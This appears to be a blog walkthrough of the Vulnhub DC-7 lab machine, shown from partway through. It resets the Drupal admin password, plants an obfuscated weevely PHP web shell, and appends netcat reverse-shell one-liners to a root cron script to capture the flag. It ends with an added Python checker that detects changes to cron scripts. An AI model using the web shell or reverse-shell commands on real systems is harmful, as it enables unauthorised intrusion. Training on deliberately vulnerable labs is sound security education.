Command user-password needs a higher bootstrap level to run - you will need to invoke drush from a more functional Drupal    [error]
environment to run this command.
The drush command 'user-password admin' could not be executed.                                                               [error]

This errors out, telling us the command must be run from within a Drupal environment, so we need to change into /var/www/html:

dc7user@dc-7:/var/www/html$ drush user-password admin --password="admin"
Changed password for admin                                                                [success]

It succeeds. Now we can log in to the site's admin backend.

Drupal 8 reverse shell

For security reasons the PHP module has been removed from Drupal core, but we can install it manually as a module.

We need to check whether the PHP module is present; first create a Basic page.

We can see that PHP is not available.

Next, install PHP:

1. Find the PHP module on the Drupal website:

https://www.drupal.org/project/php

The install link for PHP is: https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz

Enter this link:

Click Install.

Installed successfully.

Next, enable the module:

The PHP module is now enabled.

Now go back to Content.

Now we can write PHP code.

Generate a web shell with weevely

root@kali:~# weevely generate hackergu /root/hackergu.php
Generated '/root/hackergu.php' with password 'hackergu' of 742 byte size.
root@kali:~# cat hackergu.php
<?php
$H='put"#P)#P,$#Pm)==1){#P@ob_start();@e#Pval(@g#Pzunco#Pmp#Press#P(@x(@b#Pase64_#Pdecode($m[#P1]),$k)#P)#P);#P$o=#P@ob_ge';
$N='t_conte#Pnts();@ob_end#P_cl#Pean()#P;$r=@bas#Pe64_enc#Pode(@#Px(#P#P@gzc#Pompress($o),$k#P))#P;#Pprint("$p$kh$r$kf");}';
$d='$k=#P"78433#P9a5";$k#P#Ph="271d81d129#P99";$k#Pf="6da#Pd2089511#Pd";$p#P=#P"ZbTpoFQke#PsS5#PW#P04a";function#P x($t,$';
$K=str_replace('x','','xcreaxxte_fuxncxtixon');
$u='){#P$o.=$t{$i#P#P}^$k#P{$j};}}return #P$#Po;}if(@preg_mat#P#Pch("/$kh(.+)$k#Pf/",@f#Pil#Pe_get_cont#Pents("#Pphp#P://in';
$g='k#P){$c#P=strlen($#Pk#P);$l=str#Plen($t)#P;$#Po="";for($#Pi=0;$#Pi<$l;){fo#Pr($j#P=0;(#P$j<$#Pc&&$i#P#P<$l);$j++,$i++#P';
$o=str_replace('#P','',$d.$g.$u.$H.$N);
$Z=$K('',$o);$Z();
?>

weevely generate <password> <output path and filename>

Paste the generated web shell in:

Click Save.

Connect to the web shell with weevely

weevely http://192.168.203.133/node/4 hackergu

root@kali:~# weevely http://192.168.203.133/node/4 hackergu

[+] weevely 3.7.0

[+] Target:	192.168.203.133
[+] Session:	/root/.weevely/sessions/192.168.203.133/4_0.session

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

weevely> whoami
www-data
www-data@dc-7:/var/www/html $ 

Connected successfully, and we can see the current user is www-data. Now we can write to the script.

echo "nc 192.168.203.129 7777 -e /bin/bash" >> backups.sh

It turned out the command wouldn't run from inside weevely; I'm still not very familiar with the tool, so let's get another reverse shell instead.

Now we can write to the script, but after writing it I waited a long time and the reverse shell never came back...

Looking at how more experienced people did it, it should be written like this:

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.203.129 7777 >/tmp/f" >> backups.sh

Finally we got the flag.

root@kali:~# nc -lvp 7777
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::7777
Ncat: Listening on 0.0.0.0:7777
Ncat: Connection from 192.168.203.133.
Ncat: Connection from 192.168.203.133:45092.
ls
html
cd /root
ls
theflag.txt
cat theflag.txt




888       888          888 888      8888888b.                             888 888 888 888 
888   o   888          888 888      888  "Y88b                            888 888 888 888 
888  d8b  888          888 888      888    888                            888 888 888 888 
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888 
888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888 
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P 
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "  
888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888 


Congratulations!!!

Hope you enjoyed DC-7.  Just wanted to send a big thanks out there to all those
who have provided feedback, and all those who have taken the time to complete these little
challenges.

I'm sending out an especially big thanks to:

@4nqr34z
@D4mianWayne
@0xmzfr
@theart42

If you enjoyed this CTF, send me a tweet via @DCAU7.
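What finally gave root here is that the content of a cron-run script changed and nothing on the host noticed. As an added example (not part of the original post), the Python below does the minimal thing that would have caught it: record a SHA-256 baseline of each script root runs from cron and, when the live file no longer matches, report exactly which lines were added. Both script versions are constructed inline (the original is the backups.sh shown above; the appended line is a harmless marker standing in for whatever a tamperer would write), and the JSON baseline format is my own.

```python
import difflib
import hashlib
import json
import sys

# Constructed: the backup script as shown in the walkthrough.
ORIGINAL = """#!/bin/bash
rm /home/dc7user/backups/*
cd /var/www/html/
drush sql-dump --result-file=/home/dc7user/backups/website.sql
cd ..
tar -czf /home/dc7user/backups/website.tar.gz html/
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.sql
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.tar.gz
chown dc7user:dc7user /home/dc7user/backups/*
rm /home/dc7user/backups/website.sql
rm /home/dc7user/backups/website.tar.gz
"""

# Constructed: the same script with one line appended by a group-writable
# account; a benign marker stands in for the attacker's command.
TAMPERED = ORIGINAL + "echo tampered >> /tmp/marker\n"


def fingerprint(text):
    """SHA-256 of the script body, hex encoded."""
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def added_lines(before, after):
    """Lines present in `after` but not in `before`, taken from a unified diff."""
    diff = difflib.unified_diff(before.splitlines(), after.splitlines(), lineterm="")
    return [l[1:] for l in diff if l.startswith("+") and not l.startswith("+++")]


def check(current, baseline_hash, baseline_text=None):
    """Compare a live script body with its recorded baseline.
    Returns (ok, added); `added` lists the new lines when the baseline text
    is available for a diff, otherwise it is empty."""
    if fingerprint(current) == baseline_hash:
        return True, []
    added = added_lines(baseline_text, current) if baseline_text is not None else []
    return False, added


def save_baseline(paths, baseline_file):
    """Record hash and content of each script; run once from a trusted state."""
    data = {}
    for p in paths:
        with open(p, encoding="utf-8") as fh:
            body = fh.read()
        data[p] = {"sha256": fingerprint(body), "text": body}
    with open(baseline_file, "w", encoding="utf-8") as fh:
        json.dump(data, fh)


def verify_baseline(baseline_file):
    """Re-read each recorded script; returns {path: added_lines} for changed ones."""
    with open(baseline_file, encoding="utf-8") as fh:
        data = json.load(fh)
    report = {}
    for p, rec in data.items():
        with open(p, encoding="utf-8") as fh:
            ok, added = check(fh.read(), rec["sha256"], rec["text"])
        if not ok:
            report[p] = added
    return report


if __name__ == "__main__":
    # usage: save <baseline.json> <script>...   |   verify <baseline.json>
    if sys.argv[1:2] == ["save"]:
        save_baseline(sys.argv[3:], sys.argv[2])
    elif sys.argv[1:2] == ["verify"]:
        for p, added in verify_baseline(sys.argv[2]).items():
            print(f"{p}: CHANGED, added lines: {added}")
```

The baseline file must live somewhere the audited accounts cannot write (root-only, or off-host), otherwise whoever edits the script simply updates the baseline too. Running `verify` from the same root crontab that runs the backup would have reported the appended line before the job executed it a second time.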

Reproduction without permission is prohibited: HackerGu's Blog » [Vulnhub] — DC-7